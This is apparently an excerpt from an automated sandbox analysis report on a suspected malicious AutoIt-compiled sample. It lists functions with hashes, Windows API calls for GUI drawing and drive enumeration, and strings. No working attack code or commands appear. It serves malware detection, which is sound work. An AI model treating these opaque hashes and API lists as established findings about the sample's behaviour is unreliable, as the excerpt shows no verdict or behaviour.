Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: b0657710a152b79ddf16ef79a5042816a9330781677344920381bd6b0fdd6980
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: B49168725080E34EDB2E463E857407EFFE55A923A131E0B9ED4F2CA1C5FE24D964E620

Function 009619B0 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: c1bdf13b5c52574b7c6bea7a35c39165e6b056be3dd8230e8b40644e9d15024e
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: A49166722090E34EDB6D467A957403EFFE55A923A231E079ED4F2CA1C5FE24C554E620

Function 00967A4A Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a738c00bcc8f74fb03a81860ded57d019ff71c5196826eb765bc584429e173fd
Instruction ID: dfa41d17e7ddce7ec573d17cac796c0784b096f64cfe34769400a510c51d8014
Opcode Fuzzy Hash: a738c00bcc8f74fb03a81860ded57d019ff71c5196826eb765bc584429e173fd
Instruction Fuzzy Hash: 92617A7120870956DE349AF88DA5BBFE39CDF8174CF240E1AE883DB281DA19DE42C355

Function 00967CA7 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d0f39969167c25b324d4b88f7dbea16d892734d1eefb7b68b3e27a079401667
Instruction ID: df1b3e53b5ddc64459d9c510e341c3be7b2ac558e6bcf0ca02d701edf291a91d
Opcode Fuzzy Hash: 6d0f39969167c25b324d4b88f7dbea16d892734d1eefb7b68b3e27a079401667
Instruction Fuzzy Hash: 5061AB3120870962DF398AE888B1BBFE38CDF8274CF100D5AE943CB2D1EA169D46C311

Function 00961706 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: a968ca9348d9eaab747faf79c96d54e132426c60b4a479889ac0a973c1815311
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: A38186776090E30EDB6D863A853443EFFE55A923A131E079ED4F2CB1C1EE24C654E620

Function 01BC3660 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1226007560.0000000001BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1bc0000_Document 151-512024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction ID: a0a34e8de0703d6f5bee53e29b6ee8445065f8d1ca16751a98269e60b85bd991
Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction Fuzzy Hash: 8441C471D1051CDBCF48CFADC991AAEBBF1AF88201F548299D516AB345D730AB41DB40

Function 009B2046 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c185aeb3defe19670bb88a16c5a5bb2bb757d63a794ce2b3d19e641f80abd3e
Instruction ID: e5d23c754ec63acdad9575942c7867e9d649ca3e765df98f9fa6b63a573b713d
Opcode Fuzzy Hash: 0c185aeb3defe19670bb88a16c5a5bb2bb757d63a794ce2b3d19e641f80abd3e
Instruction Fuzzy Hash: 5821A5326206158BD728CF79C9226BA73E9E754320F158A2EE4A7C77D0DE75E905CB80

Function 01BC34F0 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1226007560.0000000001BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1bc0000_Document 151-512024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction ID: fb9e06356aab1335f9b241d9f4a070159f20620181657b455250ddebeb985344
Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction Fuzzy Hash: 5D01D279A00109EFCB48DF98C5909AEF7F5FB48710F6081D9D809A7301D730AE41DB80

Function 01BC3550 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1226007560.0000000001BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1bc0000_Document 151-512024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction ID: 68f7f2b7df210613baefba03f2e22ed73902e5fa8c3363aa9b59150f612c7822
Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction Fuzzy Hash: 09019278A10209EFCB48DF98C5909AEFBF5FB88710F6086D9D819A7751D730AE41DB80

Function 01BC1ED0 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1226007560.0000000001BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1bc0000_Document 151-512024.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48

Function 009D70D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 009D712F
GetSysColorBrush.USER32(0000000F), ref: 009D7160
GetSysColor.USER32(0000000F), ref: 009D716C
SetBkColor.GDI32(?,000000FF), ref: 009D7186
SelectObject.GDI32(?,?), ref: 009D7195
InflateRect.USER32(?,000000FF,000000FF), ref: 009D71C0
GetSysColor.USER32(00000010), ref: 009D71C8
CreateSolidBrush.GDI32(00000000), ref: 009D71CF
FrameRect.USER32(?,?,00000000), ref: 009D71DE
DeleteObject.GDI32(00000000), ref: 009D71E5
InflateRect.USER32(?,000000FE,000000FE), ref: 009D7230
FillRect.USER32(?,?,?), ref: 009D7262
GetWindowLongW.USER32(?,000000F0), ref: 009D7284

Part of subcall function 009D73E8: GetSysColor.USER32(00000012), ref: 009D7421
Part of subcall function 009D73E8: SetTextColor.GDI32(?,?), ref: 009D7425
Part of subcall function 009D73E8: GetSysColorBrush.USER32(0000000F), ref: 009D743B
Part of subcall function 009D73E8: GetSysColor.USER32(0000000F), ref: 009D7446
Part of subcall function 009D73E8: GetSysColor.USER32(00000011), ref: 009D7463
Part of subcall function 009D73E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 009D7471
Part of subcall function 009D73E8: SelectObject.GDI32(?,00000000), ref: 009D7482
Part of subcall function 009D73E8: SetBkColor.GDI32(?,00000000), ref: 009D748B
Part of subcall function 009D73E8: SelectObject.GDI32(?,?), ref: 009D7498
Part of subcall function 009D73E8: InflateRect.USER32(?,000000FF,000000FF), ref: 009D74B7
Part of subcall function 009D73E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 009D74CE
Part of subcall function 009D73E8: GetWindowLongW.USER32(00000000,000000F0), ref: 009D74DB

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: 8391b7afb35c8f2476d446a75097af43ca545350b058ea6573142f75d4451fe6
Instruction ID: 2d98697e88659a023509093ade8ea13a761fed7a04359f9d02de4e6655f1eaed
Opcode Fuzzy Hash: 8391b7afb35c8f2476d446a75097af43ca545350b058ea6573142f75d4451fe6
Instruction Fuzzy Hash: 0AA1B4B205D312BFDB009FA0DC48E5BBBA9FB49321F104B1AFA62961E1D734D984DB51

Function 00958D85 Relevance: 49.5, APIs: 26, Strings: 2, Instructions: 480windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 00958E14
SendMessageW.USER32(?,00001308,?,00000000), ref: 00996AC5
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00996AFE
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00996F43

Part of subcall function 00958F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00958BE8,?,00000000,?,?,?,?,00958BBA,00000000,?), ref: 00958FC5

SendMessageW.USER32(?,00001053), ref: 00996F7F
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00996F96
ImageList_Destroy.COMCTL32(00000000,?), ref: 00996FAC
ImageList_Destroy.COMCTL32(00000000,?), ref: 00996FB7

Strings

0, xrefs: 00996DCF
0n, xrefs: 00958DC2, 00996ADC, 00996B10, 00996B5F, 00996B9F, 00996C47, 00996CE8, 00996D8C, 00996E18, 00996EEF, 00996F15, 00996FC8

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
String ID: 0$0n
API String ID: 2760611726-2816077665
Opcode ID: 014697ef3f79767226195a9f9a5da43e2d7dd23a45af7d3e4dd32ebf0a615b66
Instruction ID: bb46ca902688286af3aea985c8dad188379d0fc0a0539257cc48836fedf2b5ed
Opcode Fuzzy Hash: 014697ef3f79767226195a9f9a5da43e2d7dd23a45af7d3e4dd32ebf0a615b66
Instruction Fuzzy Hash: A712EE30205202DFDB25DF28D845BAAB7F9FB48301F148469F9999B261CB31EC96DB91

Function 009C2711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 009C273E
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 009C286A
SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 009C28A9
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 009C28B9
CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 009C2900
GetClientRect.USER32(00000000,?), ref: 009C290C
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 009C2955
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 009C2964
GetStockObject.GDI32(00000011), ref: 009C2974
SelectObject.GDI32(00000000,00000000), ref: 009C2978
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 009C2988
GetDeviceCaps.GDI32(00000000,0000005A), ref: 009C2991
DeleteDC.GDI32(00000000), ref: 009C299A
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 009C29C6
SendMessageW.USER32(00000030,00000000,00000001), ref: 009C29DD
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 009C2A1D
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 009C2A31
SendMessageW.USER32(00000404,00000001,00000000), ref: 009C2A42
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 009C2A77
GetStockObject.GDI32(00000011), ref: 009C2A82
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 009C2A8D
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 009C2A97

Strings

DISPLAY, xrefs: 009C295A
static, xrefs: 009C294F, 009C2A71
msctls_progress32, xrefs: 009C2A13
AutoIt v3, xrefs: 009C28F8

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: e0dc985ddc6bd263b5cd3e0e7e4ea97228aa7cf29289564bfd0404bf7c101c25
Instruction ID: aa507abb21efd45b13626a9864f35887ad767d4ba5ee447dbb2ba4bef6b9aa1e
Opcode Fuzzy Hash: e0dc985ddc6bd263b5cd3e0e7e4ea97228aa7cf29289564bfd0404bf7c101c25
Instruction Fuzzy Hash: A9B150B1A50215AFEB14DFA8DC85FAEBBB9EB48710F008519FA15EB290D774ED40CB50

Function 009B4ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 009B4AED
GetDriveTypeW.KERNEL32(?,009DCB68,?,\\.\,009DCC08), ref: 009B4BCA
SetErrorMode.KERNEL32(00000000,009DCB68,?,\\.\,009DCC08), ref: 009B4D36

Strings

Virtual, xrefs: 009B4CE5
Fixed, xrefs: 009B4C09
SCSI, xrefs: 009B4C8A
Removable, xrefs: 009B4C10, 009B4C15
Unknown, xrefs: 009B4BED, 009B4C83
\\.\, xrefs: 009B4B3F
ATAPI, xrefs: 009B4C91
SAS, xrefs: 009B4CC9
SATA, xrefs: 009B4CD0
MMC, xrefs: 009B4CDE
Fibre, xrefs: 009B4CAD
Network, xrefs: 009B4C02
RAID, xrefs: 009B4CBB
FileBackedVirtual, xrefs: 009B4CEC
RAMDisk, xrefs: 009B4BF4
USB, xrefs: 009B4CB4
ATA, xrefs: 009B4C98
SSD, xrefs: 009B4C4A
1394, xrefs: 009B4C9F
iSCSI, xrefs: 009B4CC2
SSA, xrefs: 009B4CA6
PhysicalDrive, xrefs: 009B4B76
CDROM, xrefs: 009B4BFB

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 02b584e0cd944ce67a96880647b6ae03af2cbdfdb5efcb91b10761466aff0aab
Instruction ID: d6c114d52b4e56744d2c1e04e04cfded42d26009d15f8e6db3da288f5dc51958
Opcode Fuzzy Hash: 02b584e0cd944ce67a96880647b6ae03af2cbdfdb5efcb91b10761466aff0aab
Instruction Fuzzy Hash: 0361E63060510AABCB04DF24DB81EFD7BA4BB44B28B208815F846AB6D3DB35ED55FB41

Function 009D73E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 009D7421
SetTextColor.GDI32(?,?), ref: 009D7425
GetSysColorBrush.USER32(0000000F), ref: 009D743B
GetSysColor.USER32(0000000F), ref: 009D7446
CreateSolidBrush.GDI32(?), ref: 009D744B
GetSysColor.USER32(00000011), ref: 009D7463
CreatePen.GDI32(00000000,00000001,00743C00), ref: 009D7471
SelectObject.GDI32(?,00000000), ref: 009D7482
SetBkColor.GDI32(?,00000000), ref: 009D748B
SelectObject.GDI32(?,?), ref: 009D7498
InflateRect.USER32(?,000000FF,000000FF), ref: 009D74B7
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 009D74CE
GetWindowLongW.USER32(00000000,000000F0), ref: 009D74DB
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 009D752A
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 009D7554
InflateRect.USER32(?,000000FD,000000FD), ref: 009D7572
DrawFocusRect.USER32(?,?), ref: 009D757D
GetSysColor.USER32(00000011), ref: 009D758E
SetTextColor.GDI32(?,00000000), ref: 009D7596
DrawTextW.USER32(?,009D70F5,000000FF,?,00000000), ref: 009D75A8
SelectObject.GDI32(?,?), ref: 009D75BF
DeleteObject.GDI32(?), ref: 009D75CA
SelectObject.GDI32(?,?), ref: 009D75D0
DeleteObject.GDI32(?), ref: 009D75D5
SetTextColor.GDI32(?,?), ref: 009D75DB
SetBkColor.GDI32(?,?), ref: 009D75E5

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: d2568183e0a9852aed2623e45038859976ee830981f75f741106953c65bbded8
Instruction ID: bc0b7b0e853f549f3dba22e6ebaa652cd4cc502a63ebcb9d88155039d1853287
Opcode Fuzzy Hash: d2568183e0a9852aed2623e45038859976ee830981f75f741106953c65bbded8
Instruction Fuzzy Hash: DE618472949219AFDF019FA4DC49EEEBF79EF08320F108116F915AB2A1D7749980DF90

Function 009D0FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 009D1128
GetDesktopWindow.USER32 ref: 009D113D
GetWindowRect.USER32(00000000), ref: 009D1144
GetWindowLongW.USER32(?,000000F0), ref: 009D1199
DestroyWindow.USER32(?), ref: 009D11B9
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 009D11ED
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 009D120B
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 009D121D
SendMessageW.USER32(00000000,00000421,?,?), ref: 009D1232
SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 009D1245
IsWindowVisible.USER32(00000000), ref: 009D12A1
SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 009D12BC
SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 009D12D0
GetWindowRect.USER32(00000000,?), ref: 009D12E8
MonitorFromPoint.USER32(?,?,00000002), ref: 009D130E
GetMonitorInfoW.USER32(00000000,?), ref: 009D1328
CopyRect.USER32(?,?), ref: 009D133F
SendMessageW.USER32(00000000,00000412,00000000), ref: 009D13AA

Strings

(, xrefs: 009D131B
0, xrefs: 009D10D3
tooltips_class32, xrefs: 009D11E6

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1225009137.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_Document 151-512024.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: e950b9a90c9ca1847d8983dba0a9d100434b808c7a45ec0fa5245c81272167b2
Instruction ID: 6109800494bd7325f10fb7891205840d3aa3d9d6e6bc432a74a766c995ae7f1b
Opcode Fuzzy Hash: e950b9a90c9ca1847d8983dba0a9d100434b808c7a45ec0fa5245c81272167b2
Instruction Fuzzy Hash: E7B16C72648341AFD714DF64C885B6BFBE8FF88350F00891AF9999B2A1C771E845CB91

Function 009D0241 Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 009D02E5
_wcslen.LIBCMT ref: 009D031F
_wcslen.LIBCMT ref: 009D0389
_wcslen.LIBCMT ref: 009D03F1
_wcslen.LIBCMT ref: 009D0475
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 009D04C5
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 009D0504

Part of subcall function 0095F9F2: _wcslen.LIBCMT ref: 0095F9FD

Part of subcall function 009A223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 009A2258
Part of subcall function 009A223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 009A228A

Strings

FINDITEM, xrefs: 009D0627
GETITEMCOUNT, xrefs: 009D0316, 009D0337
DESELECT, xrefs: 009D059C
VIEWCHANGE, xrefs: 009D0675
GETTEXT, xrefs: 009D03EC, 009D0407
ISSELECTED, xrefs: 009D04DD
GETSELECTEDCOUNT, xrefs: 009D0470, 009D048B
GETSELECTED, xrefs: 009D05E1
SELECTALL, xrefs: 009D0515
SELECTCLEAR, xrefs: 009D052D
GETSUBITEMCOUNT, xrefs: 009D0384, 009D039F
SELECT, xrefs: 009D0548
SELECTINVERT, xrefs: 009D057E

Memory Dump Source

Source File: 00000000.00000002.1224921147.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true

Associated: 00000000.00000002.1224910000.0000000000940000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.00000000009DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224962627.0000000000A02000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1224995750.0000000000A0C000.00000004.00000001.01000000.00000003.sdmpDownload File
